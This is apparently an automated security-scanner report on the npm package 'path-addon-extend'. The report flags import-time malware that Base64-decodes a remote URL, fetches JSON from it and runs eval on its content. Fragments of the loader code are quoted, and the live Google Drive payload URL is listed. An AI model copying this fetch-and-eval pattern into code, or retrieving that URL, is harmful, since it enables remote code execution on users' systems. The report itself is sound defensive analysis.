AI Security Review
scanned 1h ago · by lpm-firewall-aiImporting the main entrypoint triggers an outbound request and remote-code execution. The package fetches a remotely controlled JSON payload and evaluates its `content` field.
Static reason
One or more suspicious static signals were detected.
Trigger
Any runtime `require` or import of `path-addon-extend` main entrypoint
Impact
Arbitrary JavaScript executes with the importing process's privileges.
Mechanism
Module-load remote payload fetch followed by `eval`
Attack narrative
`path.js` runs network code during module initialization, decodes a concealed Googleusercontent URL, downloads JSON, and evaluates `data.content`. Because the payload is remote and not integrity-pinned, its operator can execute arbitrary code in every process that imports the package.
Rationale
Confirmed import-time remote-code execution is concrete malicious behavior, not a path-module feature. No install hook is needed because normal package use activates the payload.
Evidence
package.jsonpath.jsREADME.md
Network endpoints1
drive.usercontent.google.com/download?id=1OV7HizRQn2sWuNg_j2MS45Epq82Bxjao&export=download
OSV Corroboration
OpenSSF/OSVAdvisory
MAL-2026-10420
Source
OpenSSF Malicious Packages via OSV
Summary
Confirmed import-time remote-code execution is concrete malicious behavior, not a path-module feature. No install hook is needed because normal package use activates the payload.
References
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `path.js` imports Node `https` at module load.
- `path.js` performs `https.get` when the package is imported.
- `path.js` Base64-decodes a Googleusercontent download URL.
- `path.js` parses the remote response then executes `eval(data.content)`.
- The remote fetch/eval is unrelated to the claimed path-module functionality.
Evidence against
- `package.json` declares no lifecycle scripts.
- Most of `path.js` is a copy of Node's path implementation.
Behavioral surface
ChildProcessEnvironmentVarsEvalNetwork
HighEntropyStrings
Source & flagged code
3 flagged · loading sourcepath.jsView file
574L575: https.get(atob('[redacted]='), (res) => {
L576:
High
Base64 Obscured Url
Source decodes a Base64-obscured HTTP endpoint at runtime.
path.jsView on unpkg · L574582const data = JSON.parse(body);
L583: eval(data.content);
L584: });
Low
Eval
Package source references a known benign dynamic code generation pattern.
path.jsView on unpkg · L582package.jsonView file
•Runtime dependency names matching Node built-ins: fs, path
High
Node Builtin Dependency Squat
Package declares a runtime dependency whose name matches a Node built-in module.
package.jsonView on unpkgFindings
2 High2 Medium2 Low
HighBase64 Obscured Urlpath.js
HighNode Builtin Dependency Squatpackage.json
MediumNetwork
MediumEnvironment Vars
LowEvalpath.js
LowHigh Entropy Strings